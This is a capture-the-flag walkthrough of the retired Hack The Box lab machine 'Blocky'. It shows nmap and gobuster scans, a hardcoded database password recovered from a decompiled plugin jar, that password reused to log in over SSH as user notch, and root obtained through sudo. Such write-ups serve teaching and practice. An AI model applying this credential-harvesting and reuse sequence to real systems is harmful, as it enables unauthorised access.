Write-up for retired machine “Blocky” on hackthebox.eu . Its a machine running Linux with IP adress: 10.10.10.37 .
Lets start by running a NMAP scan and see what ports are open.
nmap -T4 -A -p- -v 10.10.10.37
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-01 17:00 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating NSE at 17:00
Completed NSE at 17:00, 0.00s elapsed
Initiating Ping Scan at 17:00
Scanning 10.10.10.37 [ 2 ports]
Completed Ping Scan at 17:00, 0.04s elapsed ( 1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:00
Completed Parallel DNS resolution of 1 host. at 17:00, 1.01s elapsed
Initiating Connect Scan at 17:00
Scanning 10.10.10.37 [ 65535 ports]
Discovered open port 21/tcp on 10.10.10.37
Discovered open port 80/tcp on 10.10.10.37
Discovered open port 22/tcp on 10.10.10.37
Connect Scan Timing: About 24.15% done ; ETC: 17:02 ( 0:01:37 remaining)
Discovered open port 25565/tcp on 10.10.10.37
Connect Scan Timing: About 60.37% done ; ETC: 17:02 ( 0:00:40 remaining)
Completed Connect Scan at 17:02, 95.86s elapsed ( 65535 total ports)
Initiating Service scan at 17:02
Scanning 4 services on 10.10.10.37
Completed Service scan at 17:02, 6.08s elapsed ( 4 services on 1 host)
NSE: Script scanning 10.10.10.37.
Initiating NSE at 17:02
Completed NSE at 17:02, 2.07s elapsed
Initiating NSE at 17:02
Completed NSE at 17:02, 0.16s elapsed
Initiating NSE at 17:02
Completed NSE at 17:02, 0.00s elapsed
Nmap scan report for 10.10.10.37
Host is up ( 0.026s latency) .
Not shown: 65530 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5a
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 ( Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 ( RSA)
| 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 ( ECDSA)
|_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 ( ED25519)
80/tcp open http Apache httpd 2.4.18 (( Ubuntu))
|_http-generator: WordPress 4.8
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 ( Ubuntu)
|_http-title: BlockyCraft – Under Construction!
8192/tcp closed sophos
25565/tcp open minecraft Minecraft 1.11.2 ( Protocol: 127, Message: A Minecraft Server, Users: 0/20)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
With the NMAP scan we found de following open ports.
21 FTP
22 SSH
80 Apache webserver
When we visit 10.10.10.37 in Firefox we get a blockycraft, under construction website.
As we look closer at the page source head section we can see its made with Wordpress 4.8.
<meta name = "generator" content = "WordPress 4.8" />
There is not much to see exept a single blogpost made by user “Notch”.
Lets run Gobuster(can be installed in kali itself; apt install gobuster) to look for more directories.
I used dirbusters medium wordlist for this search.
gobuster dir -u http://10.10.10.37 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves ( @TheColonial) & Christian Mehlmauer ( @_FireFart_)
===============================================================
[ +] Url: http://10.10.10.37
[ +] Threads: 10
[ +] Wordlist: /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[ +] Status codes: 200,204,301,302,307,401,403
[ +] User Agent: gobuster/3.0.1
[ +] Timeout: 10s
===============================================================
2020/02/01 15:46:50 Starting gobuster
===============================================================
/wiki ( Status: 301)
/wp-content ( Status: 301)
/plugins ( Status: 301)
/wp-includes ( Status: 301)
/javascript ( Status: 301)
/wp-admin ( Status: 301)
/phpmyadmin ( Status: 301)
/server-status ( Status: 403)
===============================================================
2020/02/01 15:58:45 Finished
===============================================================
Out of the list above i’ve found /wiki to be under construction, /plugins had some .jar files to download, /phpmyadmin default login page which we don’t have a login yet.
I downloaded the BlockyCore.jar file from the plugins dir and unzipped the contents. Then I used jd-gui(also downloadable inside kali) to explore the BlockyCore.class file and we see credentials of some kind.
package com.myfirstplugin;
public class BlockyCore {
public String sqlHost = "localhost" ;
public String sqlUser = "root" ;
public String sqlPass = "8YsqfCTnvxAUeduzjNSXe22" ;
Exploitation
Tried user and pass on both phpmyadmin and Wordpress admin page with to no avail.
So lets try something else since ssh port 22 is open.
ssh [email protected]
[email protected] 's password: <paste>
Permission denied, please try again.
Lets try the notch user from the Wordpress blogpost.
ssh [email protected]
[email protected] 's password:
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
7 packages can be updated.
7 updates are security updates.
Last login: Sun Feb 2 08:09:14 2020 from 10.10.14.20
notch@Blocky:~$ ls -l
total 8
drwxrwxr-x 7 notch notch 4096 Jul 2 2017 minecraft
-r-------- 1 notch notch 32 Jul 2 2017 user.txt
notch@Blocky:~$
And we own user. User.txt can be found in the root of user notch.
After running LinEnum on the box i’ve found out notch is part of the sudo group.
[ +] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(notch) gid=1000(notch) groups=1000(notch),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
sudo su gives us access to the root account, its’ that simple.
notch@Blocky:~$ sudo su
[ sudo ] password for notch:
root@Blocky:/home/notch# ls -l /root/
total 4
-r-------- 1 root root 32 Jul 2 2017 root.txt
root@Blocky:/home/notch#